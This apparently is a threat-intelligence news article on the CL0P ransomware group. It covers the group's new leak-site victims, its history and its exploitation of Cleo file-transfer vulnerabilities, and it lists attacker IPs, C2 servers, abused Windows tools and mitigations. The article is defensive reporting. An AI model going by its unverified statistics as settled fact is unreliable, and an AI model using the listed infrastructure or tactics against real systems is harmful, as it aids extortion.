%20(1)%20(1).webp?w=1600&resize=1600,900&ssl=1)
The CL0P ransomware group, one of the most prolific cybercrime syndicates operating under the Ransomware-as-a-Service (RaaS) model, has expanded its attack footprint by listing three new victims on its dark web leak site: United Legwear & Apparel Co. (U.S.), Thermotraffic GmbH (Germany), and PHONONET GMBH (Germany).
This development comes amid heightened scrutiny of the group’s exploitation of critical vulnerabilities in enterprise software, including the recent Cleo platform vulnerabilities (CVE-2024-55956 and CVE-2024-50623).
Since resuming operations in late 2024, CL0P has compromised 66 organizations globally through its double extortion campaigns, threatening to leak sensitive data unless ransoms are paid.
Origins and Evolution of the CL0P Threat
Emerging in 2019 as a successor to the CryptoMix ransomware family, CL0P operates under the financially motivated TA505 cybercrime collective, with strong ties to Russian-speaking affiliates like FIN11.
The group’s name derives from the Russian word “klop” (bed bug), reflecting its stealthy infiltration tactics.
CL0P gained notoriety for its big game hunting strategy, targeting enterprises with annual revenues exceeding $5 million, particularly in sectors like healthcare, finance, logistics, and government.
By 2023, the U.S. Department of Justice attributed over $500 million in losses to CL0P-linked attacks, including high-profile breaches at British Airways, the BBC, and UCLA.
The ransomware’s technical sophistication lies in its multi-stage attack chain: initial access via phishing or software exploits, lateral movement through SMB protocol vulnerabilities, privilege escalation via domain controller compromise, and deployment of customized encryption payloads.
Recent campaigns have leveraged zero-day exploits in file transfer platforms like Accellion FTA, MOVEit, and Cleo’s VLTrader, enabling mass data exfiltration before encryption.
The Cleo Vulnerability Exploitation Campaign
CL0P’s 2024–2025 campaign hinges on exploiting CVE-2024-55956, a critical flaw in Cleo’s integration software that allows unauthenticated remote code execution via manipulated API requests.
This vulnerability, paired with CVE-2024-50623 (CVSS 9.8), has enabled the group to infiltrate over 1.6 million exposed assets globally, according to CYFIRMA’s telemetry.
Unlike earlier campaigns, CL0P has increasingly focused on data exfiltration without encryption, relying on the threat of leaks to pressure victims.
This shift mirrors tactics observed in the MOVEit attacks of 2023, which impacted 3,000 U.S. organizations and 8,000 worldwide.
The group’s latest Indicators of Compromise (IoCs) include attacker IPs like 185.181.230.103 (scanning host) and 176.123.5.126 (embedded in encoded PowerShell scripts), alongside C2 servers such as 185.162.128.133.
These IoCs underscore CL0P’s reliance on obfuscated scripting and legitimate administrative tools like vssadmin.exe to disable backups and taskkill.exe to terminate security processes.
New Victims and Geopolitical Targeting Trends
The addition of United Legwear & Apparel Co., a major U.S. clothing distributor, and German logistics firms Thermotraffic and PHONONET GMBH highlights CL0P’s focus on supply chain disruption.
These targets align with the group’s historical preference for industries reliant on just-in-time manufacturing and sensitive customer data.
Geopolitically, CL0P continues to avoid CIS nations while concentrating 58% of attacks on U.S. entities, followed by Germany (12%) and the UK (9%).
Notably, CL0P’s double extortion model has evolved to include direct negotiations via Tor-based chat portals and deadlines as short as 48 hours for ransom payments.
Failure to comply results in incremental data leaks, as seen in the MOVEit campaign, where 515 victims were publicly shamed within weeks.
Mitigation Strategies and Industry Response
To counter CL0P’s advanced tactics, cybersecurity agencies recommend:
- Immediate patching of Cleo, MOVEit, and Accellion FTA systems, prioritizing CVE-2024-55956 and CVE-2024-50623.
- Network segmentation to limit lateral movement, coupled with strict monitoring of SMB and RDP traffic.
- Behavioral analytics to detect anomalies in PowerShell usage or unauthorized VSS modifications.
- Dark web monitoring to identify early signs of data leakage, as CL0P frequently previews stolen data before full disclosure.
The U.S. government’s $10 million bounty for CL0P operatives, announced in July 2023, remains active, reflecting ongoing law enforcement efforts to dismantle the group.
However, with CL0P’s infrastructure resilient to takedowns and its affiliates increasingly decentralized, organizations must prioritize proactive defense measures to mitigate this persistent threat.
As ransomware tactics grow more insidious, the CL0P syndicate epitomizes the convergence of cybercrime and geopolitical posturing, leveraging vulnerabilities in global digital infrastructure to exact unprecedented financial tolls.
The latest victims serve as a stark reminder: no industry or nation is immune to this evolving crisis.
Also Read:
%20(1)%20(1).webp?w=1200&resize=1200,0&ssl=1&description=This%20development%20comes%20amid%20heightened%20scrutiny%20of%20the%20group%E2%80%99s%20exploitation%20of%20critical%20vulnerabilities%20in%20enterprise%20software.){kind=link}